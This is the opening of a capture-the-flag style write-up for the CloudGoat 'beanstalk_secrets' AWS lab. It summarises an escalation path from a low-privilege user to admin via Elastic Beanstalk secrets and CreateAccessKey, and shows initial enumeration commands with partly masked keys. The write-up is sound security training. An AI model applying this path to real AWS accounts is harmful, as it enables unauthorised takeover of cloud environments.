🥷 CloudGoat: Beanstalk Secrets (AWS CLI): Write-up: From low-privilege user to admin (AWS CLI approach)

via Dev.to (denesbeck)

🧭 Overview

Scenario: beanstalk_secrets
Platform: CloudGoat (Rhino Security Labs)
Tools: AWS CLI (no exploitation frameworks)
Objective: Extract secrets from Elastic Beanstalk, escalate to admin, and retrieve the flag.

⚔️ Attack Path Summary

Low-Priv User → Beanstalk Enum → Secondary Creds → IAM Enum → CreateAccessKey → Admin → Flag

🔑 Phase 1: Initial Access

Configure Low-Privilege Profile

aws configure --profile ebs-1
# Access Key: AKIA****************
# Secret Key: EOyTyXYE/DwNCFAHmFSla5SWz**************

Validate Credentials

aws sts get-caller-identity --profile ebs-1
{
  "UserId": "AIDA****************",
  "Account": "7912********",
  "Arn": "arn:aws:iam::7912********:user/cgid09kivyz0ga_low_priv_user"
}

🔎 Phase 2: Elastic Beanstalk Enumeration

List Applications

aws elasticbeanstalk describe-applications --profile ebs-1

Found: cgid09kivyz0ga-app - "Elastic Beanstalk application

Continue reading on Dev.to
